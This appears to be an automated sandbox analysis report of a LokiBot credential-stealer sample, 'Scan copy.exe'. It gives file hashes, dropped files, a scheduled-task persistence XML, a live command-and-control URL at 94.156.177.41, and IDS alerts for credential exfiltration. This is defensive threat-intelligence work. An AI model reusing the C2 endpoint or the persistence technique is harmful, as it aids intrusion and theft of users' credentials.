	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	la.bot.sparc.elf	Get hash	malicious	Unknown	Browse	93.123.76.46
	efN78UF3Si.exe	Get hash	malicious	DarkTortilla, SmokeLoader	Browse	94.156.177.166
	file.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	filepdf.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	94.156.177.166
	putty .exe	Get hash	malicious	DarkTortilla, SmokeLoader	Browse	94.156.177.166
	2.ps1	Get hash	malicious	Unknown	Browse	94.156.177.166
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41
	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41

Process:	C:\Users\user\Desktop\Scan copy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vLQwEscoQr.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379909843762687
Encrypted:	false
SSDEEP:	48:BWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//ZSUyus:BLHxv2IfLZ2KRH6OugEs
MD5:	8D858A903F4F5A554A798D5A9E6FC43E
SHA1:	3422755EEA787BDA946C2C36F945A471A5A11416
SHA-256:	5D2C99871C47D463475A7A52ABC4F23269E7D3EA03467C4AAF2252A4B45097D5
SHA-512:	1C1C01A733B3662DA6D0380336C59DD163CF2253C8BE1A8DC0114BC49027DD496BD8DD21816B743BB09B2390303CD27BAA8A90FA403CA90072253D64D92FD704
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edpjkv0s.byg.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izrjuvqt.fxq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbeav2kw.en0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvs0x32b.g4m.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_leqhu13t.jl5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsehfu4i.4e5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsu1xqxl.ovu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ueocvtkj.lke.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp18EC.tmp

Download File

Process:	C:\Users\user\Desktop\Scan copy.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	5.1228442075981295
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtZQxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTyv
MD5:	EE75D9F54F3DB7E427F2EC759451723D
SHA1:	A3BE41CF9FAFD0AEBB3EE9C6F21F9CFC2D3581F1
SHA-256:	C3460504D465F26AD1A1CAF4FAA8F2C8833A4E47D347741F6F6C1F01414716E0
SHA-512:	A6B4FEF67092956C26DD6146C7E96C79475A8F998B110AE2655708C76C8EEEF002E11D6AFBF66F6F4E996F489F7E8910FCDACC7C67A75113ECAF432433CC28B4
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	5.1228442075981295
Encrypted:	false
SSDEEP:	24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtZQxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTyv
MD5:	EE75D9F54F3DB7E427F2EC759451723D
SHA1:	A3BE41CF9FAFD0AEBB3EE9C6F21F9CFC2D3581F1
SHA-256:	C3460504D465F26AD1A1CAF4FAA8F2C8833A4E47D347741F6F6C1F01414716E0
SHA-512:	A6B4FEF67092956C26DD6146C7E96C79475A8F998B110AE2655708C76C8EEEF002E11D6AFBF66F6F4E996F489F7E8910FCDACC7C67A75113ECAF432433CC28B4
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\Scan copy.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\Scan copy.exe
File Type:	data
Category:	modified
Size (bytes):	50
Entropy (8bit):	1.5212424590621707
Encrypted:	false
SSDEEP:	3:/lvlp:p
MD5:	C851BF93667BDD6310D56581D955C2AE
SHA1:	8FC5AEC1542BD7471BF815632863622EFE23A834
SHA-256:	3C1A3E1EF8840689F0C6EC14E22435FC79EBC3F8771B7CD230F784CC81AE431D
SHA-512:	D3D597D36DE0EE75AA44F4F8571E56DAD810E7E6C9839F5D5E6BB05846AB6E61FAF1E9530333BD6EC5AB04098AAE935A522DBD149D214A5971A7368E18C3C9B4
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\vLQwEscoQr.exe

Download File

Process:	C:\Users\user\Desktop\Scan copy.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	721408
Entropy (8bit):	7.783790197621609
Encrypted:	false
SSDEEP:	12288:K2sv+SGjpA3yKUUo6a+bJCj64DG6rGdb7XHZH/3hexOG0CesaCvzCnYb+iXw:K2xj8JCu4XrGRB/3hDRwLCnYnw
MD5:	8C4DA707092623F03586E61F56755840
SHA1:	69BE0CB3D2D2A7930C675449636D988F22D5F1E7
SHA-256:	43E710D54CC34AE668A10B0CE9E89FD4F7D147CEF34C7D44275EC96BE9CFB901
SHA-512:	A4380540EAB3BDF8C5D4A0509900A2BEBE6B2D0D2778F75A9C393119B6B75DB5144FE340913C1104447223526C2388A01A8DF82470E0E24312E09A3B1DDD5F44
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0......\........... ........@.. .......................`............@.................................8...O........Y...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....Y.......Z..................@..@.reloc.......@......................@..B................l.......H.......P<...5......$....q..PO..........................................z..}.....(........}.....(..........0............{.....+..&...}.......0............{....o.....+......0..B.........{...., .{....o....,..(....o..........+....,...(....o....oB........0..B.........{...., .{....o....,..(....o..........+....,...(....o....oD.......r...p.{....%-.&.+.o....(....(....&..0..E.........{....o.........,1...}.....(.....{....o ...o!.....(....o....oB.....>..{.....o".......(#....

C:\Users\user\AppData\Roaming\vLQwEscoQr.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Scan copy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.783790197621609
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Scan copy.exe
File size:	721'408 bytes
MD5:	8c4da707092623f03586e61f56755840
SHA1:	69be0cb3d2d2a7930c675449636d988f22d5f1e7
SHA256:	43e710d54cc34ae668a10b0ce9e89fd4f7d147cef34c7d44275ec96be9cfb901
SHA512:	a4380540eab3bdf8c5d4a0509900a2bebe6b2d0d2778f75a9c393119b6b75db5144fe340913c1104447223526c2388a01a8df82470e0e24312e09a3b1ddd5f44
SSDEEP:	12288:K2sv+SGjpA3yKUUo6a+bJCj64DG6rGdb7XHZH/3hexOG0CesaCvzCnYb+iXw:K2xj8JCu4XrGRB/3hDRwLCnYnw
TLSH:	F5E41264529FD907C8D20BB44863E7F457749EC8E911C7079BEA7EEFB82A1572C903A0
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0......\........... ........@.. .......................`............@................................

File Icon


Icon Hash:	099bce4dd131078e

Static PE Info

General

Entrypoint:	0x4ac18a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6747D7A4 [Thu Nov 28 02:38:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
adc dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], bh
add byte ptr [eax], al
add byte ptr [eax+00h], al
add byte ptr [eax], al
push edi
add byte ptr [eax], al
add byte ptr [ebp+00h], bl
add byte ptr [eax], al
pop edi
add byte ptr [eax], al
add byte ptr [edx+00h], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], cl
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax], al
add byte ptr [edx], ch
add byte ptr [eax], al
add byte ptr [eax+eax+00h], dl
add byte ptr [ebx+00h], al
add byte ptr [eax], al
pop ebx
add byte ptr [eax], al
add byte ptr [eax+eax+00h], ah
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
or dword ptr [eax], eax
add byte ptr [eax], al
adc eax, 1C000000h
add byte ptr [eax], al
add byte ptr [ebx], dh
add byte ptr [eax], al
add byte ptr [edi+00h], al
add byte ptr [eax], al
push eax
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [ebx], dl
add byte ptr [eax], al
add byte ptr [eax+eax], bh
add byte ptr [eax], al
sbb byte ptr [eax], al
add byte ptr [eax], al
dec ecx
add byte ptr [eax], al
add byte ptr [ebx+00h], cl
add byte ptr [eax], al
dec edi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac138	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xae000	0x59f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xaa210	0xaa400	2eda0402822759b6173b066f53616be8	False	0.9082561834618208	data	7.783011599815193	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xae000	0x59f4	0x5a00	877bc04b9b34c75d33ace460bc385c31	False	0.9311197916666667	data	7.858147995414986	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb4000	0xc	0x200	fab7c9655c0b5efbedb13649a231625f	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xae100	0x531a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.968083106138949
RT_GROUP_ICON	0xb342c	0x14	data	1.05
RT_VERSION	0xb3450	0x3a4	data	0.43776824034334766
RT_MANIFEST	0xb3804	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-28T09:14:15.096111+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49703	94.156.177.41	80	TCP
2024-11-28T09:14:15.096111+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49703	94.156.177.41	80	TCP
2024-11-28T09:14:15.096111+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49703	94.156.177.41	80	TCP
2024-11-28T09:14:16.413073+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.7	49703	94.156.177.41	80	TCP
2024-11-28T09:14:16.856131+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49705	94.156.177.41	80	TCP
2024-11-28T09:14:16.856131+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49705	94.156.177.41	80	TCP
2024-11-28T09:14:16.856131+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49705	94.156.177.41	80	TCP
2024-11-28T09:14:18.371332+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.7	49705	94.156.177.41	80	TCP
2024-11-28T09:14:18.697511+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49707	94.156.177.41	80	TCP
